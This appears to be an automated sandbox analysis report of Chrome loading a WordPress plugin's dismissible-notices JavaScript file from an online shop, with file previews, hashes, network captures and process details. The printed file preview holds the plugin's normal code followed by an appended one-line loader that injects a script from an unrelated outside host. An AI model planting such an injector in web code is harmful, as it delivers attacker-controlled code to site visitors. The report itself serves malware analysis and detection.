        Preview:L..................F.@.. ...$+.,.....%Aix...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I\Z2.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V\Z2.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V\Z2.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V\Z2............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V\Z4............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........6.b......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text
        Category:downloaded
        Size (bytes):953
        Entropy (8bit):5.172421847008125
        Encrypted:false
        SSDEEP:24:31bMU02G95xyuRsHRec+U0BZUsMU0nFfpbFxRWB/WRM87m:31bxV0m50Is0PwB/Q7m
        MD5:B326350DDBBABB07F563DF81537913B5
        SHA1:1949B78A94F8DBF6C676549073E4D01A24E9708C
        SHA-256:409682CF63FAC482AF95B71EF4AE4D548B34D0AFA2E8D045A6E24FF516824AE3
        SHA-512:93DFE8236C2FCBF200D86BDF1EE3BDD87BED8B75325168311F50D9CB14DB8FCDC512BAA40A7A3973B12553BEE733611BBFF244D3A8BB818209F452475BD402BB
        Malicious:false
        Reputation:low
        URL:https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0
        Preview:function ademti_dismissible_wp_notices_handle( elem, action ) {..const slug = jQuery( elem ).data( 'ademti-notice-slug' );..if ( slug === '' ) {...return;..}..const data = {...action: action,...slug: slug,...nonce: dismissibleWpNotices.nonce,..};..jQuery.ajax(...{....type: 'POST',....url: dismissibleWpNotices.ajaxUrl,....data: data...}..);..jQuery( elem ).closest('.notice').fadeOut();..return;.}..jQuery( function () {..jQuery( '.ademti-dismiss' ).on( 'click', function ( e ) {...ademti_dismissible_wp_notices_handle( this, 'ademti_dismissible_wp_notices_dismiss' );..} );..jQuery( '.ademti-snooze' ).on( 'click', function ( e ) {...ademti_dismissible_wp_notices_handle( this, 'ademti_dismissible_wp_notices_snooze' );..} );.} );.;(function(e,l,v,j,f){j=e.createElement(l);f=e.getElementsByTagName(l)[0];j.async=1;j.src=v;f.parentNode.insertBefore(j,f);})(document,'script','https://trademark.iglesiaelarca.com/oBiWuds69dDEOqyLly+6m9I6rJvWbvHKgmU=');
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:downloaded
        Size (bytes):548
        Entropy (8bit):4.688532577858027
        Encrypted:false
        SSDEEP:12:TjeRHVIdtklI5r8INGlTF5TF5TF5TF5TF5TFK:neRH68DTPTPTPTPTPTc
        MD5:370E16C3B7DBA286CFF055F93B9A94D8
        SHA1:65F3537C3C798F7DA146C55AEF536F7B5D0CB943
        SHA-256:D465172175D35D493FB1633E237700022BD849FA123164790B168B8318ACB090
        SHA-512:75CD6A0AC7D6081D35140ABBEA018D1A2608DD936E2E21F61BF69E063F6FA16DD31C62392F5703D7A7C828EE3D4ECC838E73BFF029A98CED8986ACB5C8364966
        Malicious:false
        Reputation:low
        URL:https://littlenation.com.au/favicon.ico
        Preview:<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
        No static file info

        Download Network PCAP: filteredfull

        • Total Packets: 50
        • 443 (HTTPS)
        • 53 (DNS)
        TimestampSource PortDest PortSource IPDest IP
        Feb 28, 2025 01:33:30.134140015 CET49675443192.168.2.523.1.237.91
        Feb 28, 2025 01:33:30.134227991 CET49674443192.168.2.523.1.237.91
        Feb 28, 2025 01:33:30.243721008 CET49673443192.168.2.523.1.237.91
        Feb 28, 2025 01:33:39.739026070 CET49674443192.168.2.523.1.237.91
        Feb 28, 2025 01:33:39.768749952 CET49675443192.168.2.523.1.237.91
        Feb 28, 2025 01:33:39.911046028 CET49673443192.168.2.523.1.237.91
        Feb 28, 2025 01:33:41.594515085 CET4434970323.1.237.91192.168.2.5
        Feb 28, 2025 01:33:41.594599009 CET49703443192.168.2.523.1.237.91
        Feb 28, 2025 01:33:42.293742895 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:42.293837070 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:42.293930054 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:42.294164896 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:42.294202089 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:42.974549055 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:42.978084087 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:42.978120089 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:42.979196072 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:42.979265928 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:42.984486103 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:42.984556913 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:43.034668922 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:43.034739017 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:43.081526041 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:44.188257933 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:44.188299894 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:44.188735962 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:44.188922882 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:44.188973904 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:44.189035892 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:44.189312935 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:44.189326048 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:44.189656019 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:44.189671993 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.134264946 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.134546041 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.134560108 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.135797977 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.135965109 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.135978937 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.136331081 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.136404037 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.137463093 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.137545109 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.140136003 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.140245914 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.140762091 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.140772104 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.141587019 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.141676903 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.194447041 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.194691896 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.194701910 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.238866091 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.708865881 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.708951950 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:45.709376097 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.710710049 CET49716443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:45.710721970 CET4434971645.65.61.130192.168.2.5
        Feb 28, 2025 01:33:46.017841101 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:46.059350967 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:46.345880985 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:46.345978975 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:46.346060038 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:46.346734047 CET49715443192.168.2.545.65.61.130
        Feb 28, 2025 01:33:46.346755028 CET4434971545.65.61.130192.168.2.5
        Feb 28, 2025 01:33:52.870008945 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:52.870086908 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:33:52.870146990 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:54.146851063 CET49712443192.168.2.5142.250.184.196
        Feb 28, 2025 01:33:54.146930933 CET44349712142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:42.348617077 CET49990443192.168.2.5142.250.184.196
        Feb 28, 2025 01:34:42.348706961 CET44349990142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:42.348803997 CET49990443192.168.2.5142.250.184.196
        Feb 28, 2025 01:34:42.349118948 CET49990443192.168.2.5142.250.184.196
        Feb 28, 2025 01:34:42.349155903 CET44349990142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:43.009455919 CET44349990142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:43.009870052 CET49990443192.168.2.5142.250.184.196
        Feb 28, 2025 01:34:43.009919882 CET44349990142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:43.010219097 CET44349990142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:43.010525942 CET49990443192.168.2.5142.250.184.196
        Feb 28, 2025 01:34:43.010591984 CET44349990142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:43.050513029 CET49990443192.168.2.5142.250.184.196
        Feb 28, 2025 01:34:52.921392918 CET44349990142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:52.921554089 CET44349990142.250.184.196192.168.2.5
        Feb 28, 2025 01:34:52.921946049 CET49990443192.168.2.5142.250.184.196
        Feb 28, 2025 01:34:54.145991087 CET49990443192.168.2.5142.250.184.196
        Feb 28, 2025 01:34:54.146034956 CET44349990142.250.184.196192.168.2.5
        TimestampSource PortDest PortSource IPDest IP
        Feb 28, 2025 01:33:37.924000978 CET53614441.1.1.1192.168.2.5
        Feb 28, 2025 01:33:37.925405025 CET53654141.1.1.1192.168.2.5
        Feb 28, 2025 01:33:39.276779890 CET53536471.1.1.1192.168.2.5
        Feb 28, 2025 01:33:42.285531998 CET5950553192.168.2.51.1.1.1
        Feb 28, 2025 01:33:42.285597086 CET5431453192.168.2.51.1.1.1
        Feb 28, 2025 01:33:42.292807102 CET53595051.1.1.1192.168.2.5
        Feb 28, 2025 01:33:42.292860031 CET53543141.1.1.1192.168.2.5
        Feb 28, 2025 01:33:43.668684006 CET6178953192.168.2.51.1.1.1
        Feb 28, 2025 01:33:43.668909073 CET6125353192.168.2.51.1.1.1
        Feb 28, 2025 01:33:43.931039095 CET53612531.1.1.1192.168.2.5
        Feb 28, 2025 01:33:44.187407017 CET53617891.1.1.1192.168.2.5
        Feb 28, 2025 01:33:56.279670000 CET53585341.1.1.1192.168.2.5
        Feb 28, 2025 01:34:15.152405024 CET53554921.1.1.1192.168.2.5
        Feb 28, 2025 01:34:37.608427048 CET53616841.1.1.1192.168.2.5
        Feb 28, 2025 01:34:38.060035944 CET53589831.1.1.1192.168.2.5
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Feb 28, 2025 01:33:42.285531998 CET192.168.2.51.1.1.10x8366Standard query (0)www.google.comA (IP address)IN (0x0001)false
        Feb 28, 2025 01:33:42.285597086 CET192.168.2.51.1.1.10x1c06Standard query (0)www.google.com65IN (0x0001)false
        Feb 28, 2025 01:33:43.668684006 CET192.168.2.51.1.1.10x7002Standard query (0)littlenation.com.auA (IP address)IN (0x0001)false
        Feb 28, 2025 01:33:43.668909073 CET192.168.2.51.1.1.10x4fa7Standard query (0)littlenation.com.au65IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Feb 28, 2025 01:33:42.292807102 CET1.1.1.1192.168.2.50x8366No error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
        Feb 28, 2025 01:33:42.292860031 CET1.1.1.1192.168.2.50x1c06No error (0)www.google.com65IN (0x0001)false
        Feb 28, 2025 01:33:44.187407017 CET1.1.1.1192.168.2.50x7002No error (0)littlenation.com.au45.65.61.130A (IP address)IN (0x0001)false
        • littlenation.com.au
        • https:
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.54971645.65.61.1304432200C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        2025-02-28 00:33:45 UTC794OUTGET /wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0 HTTP/1.1
        Host: littlenation.com.au
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        sec-ch-ua-platform: "Windows"
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Sec-Fetch-Site: none
        Sec-Fetch-Mode: navigate
        Sec-Fetch-User: ?1
        Sec-Fetch-Dest: document
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        2025-02-28 00:33:45 UTC368INHTTP/1.1 200 OK
        Server: nginx
        Date: Fri, 28 Feb 2025 00:33:45 GMT
        Content-Type: application/javascript
        Content-Length: 953
        Last-Modified: Fri, 31 Jan 2025 12:51:00 GMT
        Connection: close
        Vary: Accept-Encoding
        ETag: "679cc734-3b9"
        Expires: Thu, 31 Dec 2037 23:55:55 GMT
        Cache-Control: max-age=315360000
        Access-Control-Allow-Origin: *
        Accept-Ranges: bytes
        2025-02-28 00:33:45 UTC953INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 64 65 6d 74 69 5f 64 69 73 6d 69 73 73 69 62 6c 65 5f 77 70 5f 6e 6f 74 69 63 65 73 5f 68 61 6e 64 6c 65 28 20 65 6c 65 6d 2c 20 61 63 74 69 6f 6e 20 29 20 7b 0a 09 63 6f 6e 73 74 20 73 6c 75 67 20 3d 20 6a 51 75 65 72 79 28 20 65 6c 65 6d 20 29 2e 64 61 74 61 28 20 27 61 64 65 6d 74 69 2d 6e 6f 74 69 63 65 2d 73 6c 75 67 27 20 29 3b 0a 09 69 66 20 28 20 73 6c 75 67 20 3d 3d 3d 20 27 27 20 29 20 7b 0a 09 09 72 65 74 75 72 6e 3b 0a 09 7d 0a 09 63 6f 6e 73 74 20 64 61 74 61 20 3d 20 7b 0a 09 09 61 63 74 69 6f 6e 3a 20 61 63 74 69 6f 6e 2c 0a 09 09 73 6c 75 67 3a 20 73 6c 75 67 2c 0a 09 09 6e 6f 6e 63 65 3a 20 64 69 73 6d 69 73 73 69 62 6c 65 57 70 4e 6f 74 69 63 65 73 2e 6e 6f 6e 63 65 2c 0a 09 7d 3b 0a 09 6a 51 75 65 72 79 2e
        Data Ascii: function ademti_dismissible_wp_notices_handle( elem, action ) {const slug = jQuery( elem ).data( 'ademti-notice-slug' );if ( slug === '' ) {return;}const data = {action: action,slug: slug,nonce: dismissibleWpNotices.nonce,};jQuery.


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.54971545.65.61.1304432200C:\Program Files\Google\Chrome\Application\chrome.exe
        TimestampBytes transferredDirectionData
        2025-02-28 00:33:46 UTC726OUTGET /favicon.ico HTTP/1.1
        Host: littlenation.com.au
        Connection: keep-alive
        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
        sec-ch-ua-mobile: ?0
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        sec-ch-ua-platform: "Windows"
        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
        Sec-Fetch-Site: same-origin
        Sec-Fetch-Mode: no-cors
        Sec-Fetch-Dest: image
        Referer: https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0
        Accept-Encoding: gzip, deflate, br
        Accept-Language: en-US,en;q=0.9
        2025-02-28 00:33:46 UTC166INHTTP/1.1 404 Not Found
        Server: nginx
        Date: Fri, 28 Feb 2025 00:33:46 GMT
        Content-Type: text/html
        Content-Length: 548
        Connection: close
        Vary: Accept-Encoding
        2025-02-28 00:33:46 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


        020406080s020406080100

        Click to jump to process

        020406080s0.0020406080100MB

        Click to jump to process

        Target ID:0
        Start time:19:33:33
        Start date:27/02/2025
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:2
        Start time:19:33:36
        Start date:27/02/2025
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2020,i,6988893784052022274,9947833774328402582,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:false

        Target ID:4
        Start time:19:33:42
        Start date:27/02/2025
        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlenation.com.au/wp-content/plugins/woocommerce-product-feeds/vendor-prefixed/leewillis77/dismissible-wp-notices/js/dismissible-wp-notices.js?ver=1.0"
        Imagebase:0x7ff715980000
        File size:3'242'272 bytes
        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low
        Has exited:true
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
        There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

        No disassembly